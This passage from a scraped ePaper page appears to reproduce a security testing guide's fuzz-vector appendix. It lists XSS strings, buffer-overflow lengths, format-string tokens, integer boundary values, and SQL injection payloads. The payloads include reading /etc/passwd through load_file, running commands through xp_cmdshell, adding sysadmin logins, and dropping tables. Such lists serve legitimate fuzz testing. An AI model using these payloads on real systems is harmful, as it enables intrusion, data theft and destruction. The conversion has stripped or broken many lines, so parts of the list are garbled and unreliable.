1BO4r2U
1BO4r2U
1BO4r2U
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
217 218<br />
Cross Site Scripting (XSS)<br />
For details on XSS: Cross-site Scripting (XSS)<br />
>”>alert(“XSS”)&<br />
“>@import”javascript:alert(‘XSS’)”;<br />
>”’><br />
>%22%27><br />
‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’<br />
“><br />
>”<br />
‘’;!--”=&{()}<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Buffer Overflows and Format String Errors<br />
Buffer Overflows (BFO)<br />
A buffer overflow or memory corruption attack is a programming<br />
condition which allows overflowing of valid data beyond its prelocated<br />
storage limit in memory.<br />
For details on Buffer Overflows: Testing for Buffer Overflow<br />
Note that attempting to load such a definition file within a fuzzer application<br />
can potentially cause the application to crash.<br />
A x 5<br />
A x 17<br />
A x 33<br />
A x 65<br />
A x 129<br />
A x 257<br />
A x 513<br />
A x 1024<br />
A x 2049<br />
A x 4097<br />
A x 8193<br />
A x 12288<br />
Format String Errors (FSE)<br />
Format string attacks are a class of vulnerabilities that involve supplying<br />
language specific format tokens to execute arbitrary code or<br />
crash a program. Fuzzing for such errors has as an objective to check<br />
for unfiltered user input.<br />
An excellent introduction on FSE can be found in the USENIX paper<br />
entitled: Detecting Format String Vulnerabilities with Type Qualifiers<br />
Note that attempting to load such a definition file within a fuzzer application<br />
can potentially cause the application to crash.<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%-<br />
j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
%s x 129<br />
Integer Overflows (INT)<br />
Integer overflow errors occur when a program fails to account for the<br />
fact that an arithmetic operation can result in a quantity either greater<br />
than a data type’s maximum value or less than its minimum value. If<br />
a tester can cause the program to perform such a memory allocation,<br />
the program can be potentially vulnerable to a buffer overflow attack.<br />
-1<br />
0<br />
0x100<br />
0x1000<br />
0x3fffffff<br />
0x7ffffffe<br />
0x7fffffff<br />
0x80000000<br />
0xfffffffe<br />
0xffffffff<br />
0x10000<br />
0x100000<br />
SQL Injection<br />
This attack can affect the database layer of an application and is typically<br />
present when user input is not filtered for SQL statements.<br />
For details on Testing SQL Injection: Testing for SQL Injection<br />
SQL Injection is classified in the following two categories, depending<br />
on the exposure of database information (passive) or the alteration of<br />
database information (active).<br />
• Passive SQL Injection<br />
• Active SQL Injection<br />
Active SQL Injection statements can have a detrimental effect on the<br />
underlying database if successfully executed.<br />
Passive SQL Injection (SQP)<br />
‘||(elt(-3+5,bin(15),ord(10),hex(char(45))))<br />
||6<br />
‘||’6<br />
(||6)<br />
‘ OR 1=1--<br />
OR 1=1<br />
‘ OR ‘1’=’1<br />
; OR ‘1’=’1’<br />
%22+or+isnull%281%2F0%29+%2F*<br />
%27+OR+%277659%27%3D%277659<br />
%22+or+isnull%281%2F0%29+%2F*<br />
%27+--+<br />
‘ or 1=1--<br />
“ or 1=1--<br />
‘ or 1=1 /*<br />
or 1=1--<br />
‘ or ‘a’=’a<br />
“ or “a”=”a<br />
‘) or (‘a’=’a<br />
Admin’ OR ‘<br />
‘%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.<br />
TABLES--<br />
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.<br />
TABLES;<br />
‘ having 1=1--<br />
‘ having 1=1--<br />
‘ group by userid having 1=1--<br />
‘ SELECT name FROM syscolumns WHERE id = (SELECT id<br />
FROM sysobjects WHERE name = tablename’)--<br />
‘ or 1 in (select @@version)--<br />
‘ union all select @@version--<br />
‘ OR ‘unusual’ = ‘unusual’<br />
‘ OR ‘something’ = ‘some’+’thing’<br />
‘ OR ‘text’ = N’text’<br />
‘ OR ‘something’ like ‘some%’<br />
‘ OR 2 > 1<br />
‘ OR ‘text’ > ‘t’<br />
‘ OR ‘whatever’ in (‘whatever’)<br />
‘ OR 2 BETWEEN 1 and 3<br />
‘ or username like char(37);<br />
‘ union select * from users where login =<br />
char(114,111,111,116);<br />
‘ union select<br />
Password:*/=1--<br />
UNI/**/ON SEL/**/ECT<br />
‘; EXECUTE IMMEDIATE ‘SEL’ || ‘ECT US’ || ‘ER’<br />
‘; EXEC (‘SEL’ + ‘ECT US’ + ‘ER’)<br />
‘/**/OR/**/1/**/=/**/1<br />
‘ or 1/*<br />
+or+isnull%281%2F0%29+%2F*<br />
%27+OR+%277659%27%3D%277659<br />
%22+or+isnull%281%2F0%29+%2F*<br />
%27+--+&password=<br />
‘; begin declare @var varchar(8000) set @var=’:’ select @<br />
var=@var+’+login+’/’+password+’ ‘ from users where login ><br />
@var select @var as var into temp end --<br />
‘ and 1 in (select var from temp)--<br />
‘ union select 1,load_file(‘/etc/passwd’),1,1,1;<br />
1;(load_file(ch<br />
ar(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;<br />
‘ and 1=( if((load_file(char(110,46,101,120,116))ch<br />
ar(39,39)),1,0));<br />
Active SQL Injection (SQI)<br />
‘; exec master..xp_cmdshell ‘ping 10.10.1.2’--<br />
CREATE USER name IDENTIFIED BY ‘pass123’<br />
CREATE USER name IDENTIFIED BY pass123 TEMPORARY<br />
TABLESPACE temp DEFAULT TABLESPACE users;<br />
‘ ; drop table temp --<br />
exec sp_addlogin ‘name’ , ‘password’<br />
exec sp_addsrvrolemember ‘name’ , ‘sysadmin’<br />
INSERT INTO mysql.user (user, host, password) VALUES<br />
(‘name’, ‘localhost’, PASSWORD(‘pass123’))<br />
GRANT CONNECT TO name; GRANT RESOURCE TO name;<br />
INSERT INTO Users(Login, Password, Level) VALUES(<br />
char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72)<br />
+ char(0x70)<br />
+ char(0x65) + char(0x74) + char(0x65) + char(0x-<br />
72),char(0x64)